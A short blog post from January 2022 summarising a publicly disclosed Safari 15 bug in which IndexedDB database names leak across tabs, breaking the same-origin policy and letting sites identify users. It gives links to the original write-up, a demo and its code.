Exploiting IndexedDB API information leaks in Safari 15

Written by / Original link on Jan. 16, 2022


There’s a pretty nasty exploit in Safari 15, where sites/tabs that interact with an IndexedDB database leak that name to other tabs.

In Safari 15 on macOS, and in all browsers on iOS and iPadOS 15, the IndexedDB API is violating the same-origin policy. Every time a website interacts with a database, a new (empty) database with the same name is created in all other active frames, tabs, and windows within the same browser session. Windows and tabs usually share the same session, unless you switch to a different profile or open a private window.

As some sites — such as Google’s properties — include a unique identifier in the database name, that information can be used to identify a user.

I feel sorry for the WebKit/Safari Engineers that this got published just before the weekend, but on the other hand the security bug was reported in November already and has gone left unhandled. (Because it was filed a security bug, it’s not publicly accessible).

Do note that due to all browsers on iOS being forced to use the same MobileSafari WebKit build, all browsers on that platform are affected.

Exploiting IndexedDB API information leaks in Safari 15 →
Safari 15 IndexedDB Leaks →
Safari 15 IndexedDB Leaks Code →

bram bram calevans link safari googleblog bram

« "It's your fault" - Parcel CSS: A new CSS parser, compiler, and minifier written in Rust (+ example project) »